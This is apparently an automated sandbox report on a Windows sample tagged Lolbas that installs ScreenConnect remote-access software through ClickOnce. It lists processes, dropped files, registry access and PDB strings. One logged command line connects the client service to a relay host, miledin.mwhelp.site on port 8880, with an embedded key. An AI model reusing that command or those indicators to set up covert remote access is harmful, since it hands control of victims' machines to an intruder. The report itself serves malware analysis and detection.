                  Source: unknown | HTTPS traffic detected: 104.21.72.99:443 -> 192.168.2.9:49684 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect

                  System Summary

                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe | PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 748
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.cs Task registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engine Classification label: mal54.evad.winEXE@9/70@2/2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Code function: 0_2_003A1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Deployment
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Mutant created: NULL
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7112
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6924
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Command line argument: dfshim 0_2_003A1000
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Virustotal: Detection: 16%
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe ReversingLabs: Detection: 26%
                  Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 748
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 1312
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: certificate valid
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb3 source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.000000000134A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb a source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: ScreenConnect.Core.pdbJt source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: ScreenConnect.Windows.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: C:\Windows\ScreenConnect.ClientService.pdbpdbice.pdbH source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb4 source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Core.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: ScreenConnect.Windows.pdbH source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: ScreenConnect.Core.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4C3B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B62000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4788000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325166034.0000000002410000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325286877.00000000026EF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.1289094143.0000000005582000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000009.00000000.1255423787.00000000009BD000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: \??\C:\Windows\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: nXC:\Windows\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287827656.0000000001158000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: nect.Core.pdbpdk source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1245194119.00000000002A2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: \??\C:\Windows\ScreenConnect.ClientService.pdb{ source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1245194119.00000000002A2000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: mscorlib.pdbP source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: e.pdbh source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: reenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA45D8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325035100.00000000023D2000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb= source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.ni.pdbRSDS source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Configuration.pdbSystem.ni.dllSystem.Core.dll source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: n0C:\Windows\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ScreenConnect.ClientService.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbta source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Configuration.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: @o.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4784000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4D29000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B5E000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.1289418244.00000000056A2000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: Binary string: %%.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdbe source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdb\ source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA4B66000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA4C3B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.1766358365.000001BCA478C000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000009.00000002.1289884811.0000000005CA2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: ?oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: System.pdb4 source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Core.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: symbols\dll\mscorlib.pdbLb source: ScreenConnect.ClientService.exe, 00000009.00000002.1289837912.0000000005C7B000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.1766358365.000001BCA45D8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1325035100.00000000023D2000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: Core.pdb/ source: ScreenConnect.ClientService.exe, 00000009.00000002.1287919374.00000000012E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdb source: WERA625.tmp.dmp.11.dr
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERA625.tmp.dmp.11.dr
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsFileManager.exe.1.drStatic PE information: 0xC9D5F63E [Wed Apr 21 14:57:02 2077 UTC]
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_003A1000
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: real checksum: 0x14df5 should be: 0x16eed
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_003A1BC0 push ecx; ret 0_2_003A1BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C194D2A5 pushad ; iretd 1_2_00007FF9C194D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A6845E push eax; ret 1_2_00007FF9C1A6846D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A6842E pushad ; ret 1_2_00007FF9C1A6845D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A67D00 push eax; retf 1_2_00007FF9C1A67D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF9C1A600BD pushad ; iretd 1_2_00007FF9C1A600C1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1A7845E push eax; ret 8_2_00007FF9C1A7846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1A7842E pushad ; ret 8_2_00007FF9C1A7845D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1A62E40 pushad ; ret 8_2_00007FF9C1A62E73
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1A78071 pushad ; retf 8_2_00007FF9C1A7809D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1A630B2 pushad ; iretd 8_2_00007FF9C1A630B3
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FF9C1D5B055 push eax; ret 8_2_00007FF9C1D5B089
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre..ient_4b14c015c87c1ad8_0018.0004_none_b4e7e84fe683500e\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\J8DJW80Y.32E\O51HK9NW.DQA\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\DGXVV1KR.NBQ\A4E9ZACA.Q12\scre...exe_25b0fbb6ef7eb094_0018.0004_none_9837ada041d46b8d\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
